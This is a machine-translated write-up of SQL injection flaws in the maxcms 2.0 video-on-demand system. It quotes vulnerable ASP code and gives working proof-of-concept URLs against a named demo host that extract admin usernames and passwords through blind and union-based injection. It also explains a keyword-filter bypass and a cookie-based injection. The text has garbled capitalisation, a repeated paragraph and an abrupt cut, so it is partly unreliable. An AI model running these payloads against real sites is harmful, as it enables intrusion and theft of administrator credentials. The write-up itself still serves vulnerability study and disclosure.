Analysis of maxcmsSQL Injection Vulnerabilities

This system is a very popular on-demand Video-on-Demand System in China. The previous version 1.5 has many vulnerabilities. Version 2.0 has improved its security, but there are still vulnerabilities. Check the Code \ inc \ ajax. aspdimaction: actiongetForm (action, get) response. CharsetgbkSelectcaseactioncasenewslist: viewNewsLi

This system is a very popular on-demand Video-on-Demand System in China. The previous version 1.5 has many vulnerabilities. Version 2.0 has improved its security, but there are still vulnerabilities.

View code

INcAjax. asp

 
 

  
  
Dim action: action = getFoRm("Action", "get ")
  
  
Response. CharSet= "Gbk"
  
  
 
  
  
SelectCase action
  
  
Case "newslist": viewNewsList
  
  
Case "newscontent": viewNewsContent
  
  
Case "digg ","TrEad ": scoreVIdEo (action)
  
  
Case "reporterr": reportErr
  
  
Case "hit": upDateHit
  
  
Case eLsE: main
  
  
End Select 
  
  
TerminateAllObjects
  
  
 
  
  
......
  
  
 
  
  
SubScoreVideo (operType)
  
  
Dim SQL, id, digg, returnValue: id = getForm ("id", "get ")
  
  
\ 'Get the id value through get
  
  
If rCookie ("maxcms2_score" & id) = "OK" then die "havescore"
  
  
If isNul (id) then die "err"
  
  
\ 'On error reSuMe nExT
  
  
Digg = conn. db ("select m_digg from {pre} data where m_id =" & id, "exeCutE ") (0)
  
  
\ 'Parameter id, which is included in the SQL statement for query without Filtering
  
  
If err then digg = 0: err.Clear()
  
  
If not isNum (id) then echoSaveStr "safe" else id = cLnG (id)
  
  
\ 'Digg is queried. Pay attention to the returned content.
  
  
......
 
 

It is easy to use. Construct an SQL statement for submission (the default structure is m_manager, m_username, m _Pwd), Which can be determined based on the returned content.

If the constructed statement is correct, a message similar to warning that the data you submitted has invalid characters is returned. your IP address xxxx has been recorded and operated.

If the constructed statement is incorrect, 500 is returned.

Poc:

Correct:

 
 

  
  
http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97 
 
 

 
Incorrect:

 
 

  
  
http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99 
 
 

In fact, just find an injection tool and run it.
 

I used to briefly read this system. The specific code is not recorded, so I will leave two injection statements. Maybe the injection is no longer there.
This vulnerability is really mentally retarded. Because the keyword is used for SQL detection and filtering, but many important keywords are followed by spaces, so that we can use the () method to replace spaces to bypass the problem.

 
 

  
  
http://localhost/play.asp?id=-999+union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])  
  
  
http://localhost/play.asp?id=-999+union(select(adminname),2,3,4,5,6,7,8,9,0,1+from+[zt_admin]) 
 
 

 

Another injection

 
 

  
  
Sub checkPower  
  
  
    dim loginValidate,rsObj : loginValidate = "maxcms2.0" 
  
  
    err.clear  
  
  
    on error resume next  
  
  
    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username=\'"&rCookie("m_username")&"\'","execute")  
  
  
    loginValidate = md5(getAgent&getIp&rsObj(0))  
  
  
    if err then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》" 
  
  
    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》" 
  
  
    checkManagerLevel  rsObj(1)  
  
  
    set rsObj=nothing  
  
  
End Sub 
 
 

Where

 
 

  
  
Function rCookie(cookieName)